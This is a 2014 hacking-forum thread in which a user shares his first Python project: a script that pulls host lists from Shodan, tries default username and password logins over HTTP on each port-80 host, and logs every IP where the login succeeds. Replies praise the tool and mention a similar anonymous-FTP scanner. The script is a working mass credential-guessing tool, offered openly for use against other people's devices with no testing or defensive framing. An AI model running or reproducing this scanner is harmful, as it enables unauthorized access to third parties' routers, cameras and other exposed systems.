Author Topic: [Python] Shodan bruteforce bot (first Python project)  (Read 2715 times)

0 Members and 3 Guests are viewing this topic.

Offline hppd

  • Knight
  • **
  • Posts: 163
  • Cookies: 7
    • View Profile
[Python] Shodan bruteforce bot (first Python project)
« on: February 05, 2014, 03:10:21 pm »
Wassup ez.

This script grabs a bunch of ip's for the query you specified in Shodan. And then tries to authenticate with them using the default password /username (that you specified). The succesrate is surprisingly good :D

I first tried to write this in java but that was extremely unneficient. So I looked into python noticed it was perfect for this kind of stuff and came up with this script:

Code: [Select]
import shodan
import requests
import sys

#author HPPD
#defining api key and search
SHODAN_API_KEY = "Put your API key here"
api = shodan.Shodan(SHODAN_API_KEY)
iptotal = ('IP list')

if __name__ == "__main__":
    if len(sys.argv) != 5:
        print('Usage: <query> <username> <password> <lastpagenumber>')
        sys.exit(0)
    else:
        query = sys.argv[1]
        username = sys.argv[2]
        password = sys.argv[3]
        endpage = int(sys.argv[4])
        pagenmbr = 8
       
        #Checking if the wanted page is reached   
        while pagenmbr <= endpage:
           
            try:
                # Search Shodan
                pagenmbr = pagenmbr + 1
                results = api.search(query, pagenmbr)
               
                # Show the results
                print ('Results found: %s' % results['total'])
                for result in results['matches']:
                    #Check for open port 80 and try to log in
                    if result['port'] == 80:
                        ipauth = result['ip_str']
                        print ('IP open on port 80: %s' % ipauth)
                        r = requests.get('http://' + ipauth, auth=(username, password))
                        #If log in is succesfull add ip, countrycode to iptotal
                        if r.status_code == requests.codes.ok:
                            print('Fuck yeah succes!')
                            iptotal = (iptotal + ', ' + ipauth)                               
            except Exception as e:
                print("Oops!  Something went wrong, the ip is probably unreachable. Try again, or tell the doctor!")
                pass
           

                print ('Error: %s' % e)
    #Append succeeded items to file
    filename = ('outputsbb_' + query + '.txt')
    with open(filename, "a") as myfile:
        myfile.write(iptotal)
       
       
    print(iptotal + '\n Written to file' + filename )
   

If you think something can be done more efficient let me know :D

EDIT: Removed the else in the except, since it wasn't doing anything there. Thx Phage
 
« Last Edit: February 05, 2014, 06:41:42 pm by hppd »

Offline CorruptedByte

  • Serf
  • *
  • Posts: 23
  • Cookies: 2
  • Lët Thë Hãçkïng Bëgïn
    • View Profile
    • Underc0de
Re: [Python] Shodan bruteforce bot (first Python project)
« Reply #1 on: February 05, 2014, 06:19:17 pm »
I wrote a similar code but for ftp trying to connect with the anonymous user, it's very useful but more if you have credits in shodan for the querys
« Last Edit: February 05, 2014, 06:20:11 pm by CorruptedByte »

Offline nafuti

  • Serf
  • *
  • Posts: 43
  • Cookies: 11
    • View Profile
Re: [Python] Shodan bruteforce bot (first Python project)
« Reply #2 on: February 05, 2014, 09:58:05 pm »
You finally posted it here. I saw you talking about it on irc. Its so simple and like python can always amaze us.

Offline hppd

  • Knight
  • **
  • Posts: 163
  • Cookies: 7
    • View Profile
Re: [Python] Shodan bruteforce bot (first Python project)
« Reply #3 on: February 05, 2014, 11:03:20 pm »
You finally posted it here. I saw you talking about it on irc. Its so simple and like python can always amaze us.

Yeah man python is awesome.. When I was trying it in Java it took me ages to just get the JSON thing working and I ha waaaay too much code..

Right now I'm takeing out the bugs and implementing asycn connections cause the script's slow as fuck

Offline d4rkcat

  • Knight
  • **
  • Posts: 287
  • Cookies: 115
  • He who controls the past controls the future. He who controls the present controls the past.
    • View Profile
    • Scripts
Re: [Python] Shodan bruteforce bot (first Python project)
« Reply #4 on: February 08, 2014, 08:52:29 pm »
Python has the shodan module.
It's perfect for this script.
There are others similar just for searching shodan, the problem is, as CorruptedBye pointed out, is that you need "credits" to get alot of results.
When i saw the title I tought that this cracked that system.. oh well

Nice script
Jabber (OTR required): thed4rkcat@einfachjabber.de    Email (PGP required): thed4rkcat@yandex.com    PGP Key: here and here     Blog

<sofldan> not asking for anyone to hold my hand uber space shuttle door gunner guy.


Offline hppd

  • Knight
  • **
  • Posts: 163
  • Cookies: 7
    • View Profile
Re: [Python] Shodan bruteforce bot (first Python project)
« Reply #5 on: February 09, 2014, 12:29:39 am »
Python has the shodan module.
It's perfect for this script.
There are others similar just for searching shodan, the problem is, as CorruptedBye pointed out, is that you need "credits" to get alot of results.
When i saw the title I tought that this cracked that system.. oh well

Nice script
Yeah I can do that but then I have to work with cookies, parse the html aand it's gonnna be muche slower.. Just useing the API is much faster and it isn't that expensive. Good ROI :P